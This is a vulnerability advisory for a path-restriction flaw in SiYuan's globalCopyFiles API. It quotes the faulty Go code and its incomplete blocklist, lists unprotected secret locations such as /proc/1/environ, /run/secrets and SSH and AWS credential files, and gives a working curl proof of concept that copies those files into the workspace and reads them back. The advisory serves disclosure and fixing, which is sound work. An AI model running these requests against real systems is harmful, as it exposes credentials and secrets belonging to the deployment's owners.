CVE-2026-32747

Description

### Summary `POST /api/file/globalCopyFiles` reads source files using `filepath.Abs()` with no workspace boundary check, relying solely on `util.IsSensitivePath()` whose blocklist omits `/proc/`, `/run/secrets/`, and home directory dotfiles. An admin can copy `/proc/1/environ` or Docker secrets into the workspace and read them via the standard file API. ### Details **File:** `kernel/api/file.go` - function `globalCopyFiles` ```go for i, src := range srcs { absSrc, _ := filepath.Abs(src) // not restricted to workspace if util.IsSensitivePath(absSrc) { // blocklist is incomplete return } srcs[i] = absSrc } destDir := filepath.Join(util.WorkspaceDir, destDir) for _, src := range srcs { dest := filepath.Join(destDir, filepath.Base(src)) filelock.Copy(src, dest) // copies unchecked sensitive file into workspace } ``` **`IsSensitivePath` blocklist** (`kernel/util/path.go`): ```go prefixes := []string{"/etc/ssh", "/root", "/etc", "/var/lib/", "/."} ``` **Not blocked - exploitable targets:** | Path | Contains | |------|----------| | `/proc/1/environ` | All env vars: `DATABASE_URL`, `AWS_ACCESS_KEY_ID`, `ANTHROPIC_API_KEY` | | `/run/secrets/*` | Docker Swarm / Compose injected secrets | | `/home/siyuan/.aws/credentials` | AWS credentials (non-root user) | | `/home/siyuan/.ssh/id_rsa` | SSH private key (non-root user) | | `/tmp/` | Temporary files including tokens | ### PoC **Environment:** ```bash docker run -d --name siyuan -p 6806:6806 \ -v $(pwd)/workspace:/siyuan/workspace \ b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123 ``` **Exploit:** ```bash TOKEN="YOUR_ADMIN_TOKEN" # Step 1: Copy /proc/1/environ (process env vars) into workspace assets curl -s -X POST http://localhost:6806/api/file/globalCopyFiles \ -H "Authorization: Token $TOKEN" \ -H "Content-Type: application/json" \ -d '{"srcs":["/proc/1/environ"],"destDir":"data/assets/"}' # Step 2: Read the copied file via standard API curl -s -X POST http://localhost:6806/api/file/getFile \ -H "Authorization: Token $TOKEN" \ -H "Content-Type: application/json" \ -d '{"path":"/data/assets/environ"}' | tr '\0' '\n' # Output: HOSTNAME=abc\nPATH=/usr/local/sbin:...\nDATABASE_URL=postgres://...\nAPI_KEY=sk-... ``` **Docker secrets:** ```bash # Copy all Docker-injected secrets curl -s -X POST http://localhost:6806/api/file/globalCopyFiles \ -H "Authorization: Token $TOKEN" \ -H "Content-Type: application/json" \ -d '{"srcs":["/run/secrets/db_password","/run/secrets/api_token"],"destDir":"data/assets/"}' ``` ### Impact An admin can exfiltrate any file readable by the SiYuan process that falls outside the incomplete blocklist. In containerized deployments this includes all injected secrets and environment variables - a common pattern for passing credentials to containers. The exfiltrated files are then accessible via the standard workspace file API and persist until manually deleted.

Priority Score